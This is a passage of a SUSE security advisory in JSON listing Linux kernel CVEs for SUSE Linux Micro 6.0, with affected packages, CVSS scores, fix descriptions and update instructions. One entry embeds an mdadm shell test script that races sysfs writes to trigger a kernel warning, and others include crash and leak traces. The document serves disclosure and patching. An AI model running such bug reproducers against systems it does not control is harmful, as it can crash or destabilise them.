"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53785",
"url": "https://www.suse.com/security/cve/CVE-2023-53785"
},
{
"category": "external",
"summary": "SUSE Bug 1254918 for CVE-2023-53785",
"url": "https://bugzilla.suse.com/1254918"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53785"
},
{
"cve": "CVE-2023-53787",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53787"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: da9063: fix null pointer deref with partial DT config\n\nWhen some of the da9063 regulators do not have corresponding DT nodes\na null pointer dereference occurs on boot because such regulators have\nno init_data causing the pointers calculated in\nda9063_check_xvp_constraints() to be invalid.\n\nDo not dereference them in this case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53787",
"url": "https://www.suse.com/security/cve/CVE-2023-53787"
},
{
"category": "external",
"summary": "SUSE Bug 1254750 for CVE-2023-53787",
"url": "https://bugzilla.suse.com/1254750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53787"
},
{
"cve": "CVE-2023-53791",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53791"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix warning for holder mismatch from export_rdev()\n\nCommit a1d767191096 (\"md: use mddev-\u003eexternal to select holder in\nexport_rdev()\") fix the problem that \u0027claim_rdev\u0027 is used for\nblkdev_get_by_dev() while \u0027rdev\u0027 is used for blkdev_put().\n\nHowever, if mddev-\u003eexternal is changed from 0 to 1, then \u0027rdev\u0027 is used\nfor blkdev_get_by_dev() while \u0027claim_rdev\u0027 is used for blkdev_put(). And\nthis problem can be reporduced reliably by following:\n\nNew file: mdadm/tests/23rdev-lifetime\n\ndevname=${dev0##*/}\ndevt=`cat /sys/block/$devname/dev`\npid=\"\"\nruntime=2\n\nclean_up_test() {\n pill -9 $pid\n echo clear \u003e /sys/block/md0/md/array_state\n}\n\ntrap \u0027clean_up_test\u0027 EXIT\n\nadd_by_sysfs() {\n while true; do\n echo $devt \u003e /sys/block/md0/md/new_dev\n done\n}\n\nremove_by_sysfs(){\n while true; do\n echo remove \u003e /sys/block/md0/md/dev-${devname}/state\n done\n}\n\necho md0 \u003e /sys/module/md_mod/parameters/new_array || die \"create md0 failed\"\n\nadd_by_sysfs \u0026\npid=\"$pid $!\"\n\nremove_by_sysfs \u0026\npid=\"$pid $!\"\n\nsleep $runtime\nexit 0\n\nTest cmd:\n\n./test --save-logs --logdir=/tmp/ --keep-going --dev=loop --tests=23rdev-lifetime\n\nTest result:\n\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 960 at block/bdev.c:618 blkdev_put+0x27c/0x330\nModules linked in: multipath md_mod loop\nCPU: 0 PID: 960 Comm: test Not tainted 6.5.0-rc2-00121-g01e55c376936-dirty #50\nRIP: 0010:blkdev_put+0x27c/0x330\nCall Trace:\n \u003cTASK\u003e\n export_rdev.isra.23+0x50/0xa0 [md_mod]\n mddev_unlock+0x19d/0x300 [md_mod]\n rdev_attr_store+0xec/0x190 [md_mod]\n sysfs_kf_write+0x52/0x70\n kernfs_fop_write_iter+0x19a/0x2a0\n vfs_write+0x3b5/0x770\n ksys_write+0x74/0x150\n __x64_sys_write+0x22/0x30\n do_syscall_64+0x40/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nFix the problem by recording if \u0027rdev\u0027 is used as holder.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53791",
"url": "https://www.suse.com/security/cve/CVE-2023-53791"
},
{
"category": "external",
"summary": "SUSE Bug 1254742 for CVE-2023-53791",
"url": "https://bugzilla.suse.com/1254742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53791"
},
{
"cve": "CVE-2023-53792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix memory leak in dhchap_ctrl_secret\n\nFree dhchap_secret in nvme_ctrl_dhchap_ctrl_secret_store() before we\nreturn when nvme_auth_generate_key() returns error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53792",
"url": "https://www.suse.com/security/cve/CVE-2023-53792"
},
{
"category": "external",
"summary": "SUSE Bug 1254743 for CVE-2023-53792",
"url": "https://bugzilla.suse.com/1254743"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53792"
},
{
"cve": "CVE-2023-53793",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53793"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf tool x86: Fix perf_env memory leak\n\nFound by leak sanitizer:\n```\n==1632594==ERROR: LeakSanitizer: detected memory leaks\n\nDirect leak of 21 byte(s) in 1 object(s) allocated from:\n #0 0x7f2953a7077b in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:439\n #1 0x556701d6fbbf in perf_env__read_cpuid util/env.c:369\n #2 0x556701d70589 in perf_env__cpuid util/env.c:465\n #3 0x55670204bba2 in x86__is_amd_cpu arch/x86/util/env.c:14\n #4 0x5567020487a2 in arch__post_evsel_config arch/x86/util/evsel.c:83\n #5 0x556701d8f78b in evsel__config util/evsel.c:1366\n #6 0x556701ef5872 in evlist__config util/record.c:108\n #7 0x556701cd6bcd in test__PERF_RECORD tests/perf-record.c:112\n #8 0x556701cacd07 in run_test tests/builtin-test.c:236\n #9 0x556701cacfac in test_and_print tests/builtin-test.c:265\n #10 0x556701cadddb in __cmd_test tests/builtin-test.c:402\n #11 0x556701caf2aa in cmd_test tests/builtin-test.c:559\n #12 0x556701d3b557 in run_builtin tools/perf/perf.c:323\n #13 0x556701d3bac8 in handle_internal_command tools/perf/perf.c:377\n #14 0x556701d3be90 in run_argv tools/perf/perf.c:421\n #15 0x556701d3c3f8 in main tools/perf/perf.c:537\n #16 0x7f2952a46189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nSUMMARY: AddressSanitizer: 21 byte(s) leaked in 1 allocation(s).\n```",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53793",
"url": "https://www.suse.com/security/cve/CVE-2023-53793"
},
{
"category": "external",
"summary": "SUSE Bug 1254739 for CVE-2023-53793",
"url": "https://bugzilla.suse.com/1254739"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53793"
},
{
"cve": "CVE-2023-53794",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53794"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix session state check in reconnect to avoid use-after-free issue\n\nDon\u0027t collect exiting session in smb2_reconnect_server(), because it\nwill be released soon.\n\nNote that the exiting session will stay in server-\u003esmb_ses_list until\nit complete the cifs_free_ipc() and logoff() and then delete itself\nfrom the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53794",
"url": "https://www.suse.com/security/cve/CVE-2023-53794"
},
{
"category": "external",
"summary": "SUSE Bug 1255163 for CVE-2023-53794",
"url": "https://bugzilla.suse.com/1255163"
},
{
"category": "external",
"summary": "SUSE Bug 1255235 for CVE-2023-53794",
"url": "https://bugzilla.suse.com/1255235"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-53794"
},
{
"cve": "CVE-2023-53795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: IOMMUFD_DESTROY should not increase the refcount\n\nsyzkaller found a race where IOMMUFD_DESTROY increments the refcount:\n\n obj = iommufd_get_object(ucmd-\u003eictx, cmd-\u003eid, IOMMUFD_OBJ_ANY);\n if (IS_ERR(obj))\n return PTR_ERR(obj);\n iommufd_ref_to_users(obj);\n /* See iommufd_ref_to_users() */\n if (!iommufd_object_destroy_user(ucmd-\u003eictx, obj))\n\nAs part of the sequence to join the two existing primitives together.\n\nAllowing the refcount the be elevated without holding the destroy_rwsem\nviolates the assumption that all temporary refcount elevations are\nprotected by destroy_rwsem. Racing IOMMUFD_DESTROY with\niommufd_object_destroy_user() will cause spurious failures:\n\n WARNING: CPU: 0 PID: 3076 at drivers/iommu/iommufd/device.c:477 iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:478\n Modules linked in:\n CPU: 0 PID: 3076 Comm: syz-executor.0 Not tainted 6.3.0-rc1-syzkaller #0\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023\n RIP: 0010:iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:477\n Code: e8 3d 4e 00 00 84 c0 74 01 c3 0f 0b c3 0f 1f 44 00 00 f3 0f 1e fa 48 89 fe 48 8b bf a8 00 00 00 e8 1d 4e 00 00 84 c0 74 01 c3 \u003c0f\u003e 0b c3 0f 1f 44 00 00 41 57 41 56 41 55 4c 8d ae d0 00 00 00 41\n RSP: 0018:ffffc90003067e08 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888109ea0300 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: 0000000000000000 RDI: 00000000ffffffff\n RBP: 0000000000000004 R08: 0000000000000000 R09: ffff88810bbb3500\n R10: ffff88810bbb3e48 R11: 0000000000000000 R12: ffffc90003067e88\n R13: ffffc90003067ea8 R14: ffff888101249800 R15: 00000000fffffffe\n FS: 00007ff7254fe6c0(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000555557262da8 CR3: 000000010a6fd000 CR4: 0000000000350ef0\n Call Trace:\n \u003cTASK\u003e\n iommufd_test_create_access drivers/iommu/iommufd/selftest.c:596 [inline]\n iommufd_test+0x71c/0xcf0 drivers/iommu/iommufd/selftest.c:813\n iommufd_fops_ioctl+0x10f/0x1b0 drivers/iommu/iommufd/main.c:337\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x84/0xc0 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x38/0x80 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe solution is to not increment the refcount on the IOMMUFD_DESTROY path\nat all. Instead use the xa_lock to serialize everything. The refcount\ncheck == 1 and xa_erase can be done under a single critical region. This\navoids the need for any refcount incrementing.\n\nIt has the downside that if userspace races destroy with other operations\nit will get an EBUSY instead of waiting, but this is kind of racing is\nalready dangerous.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
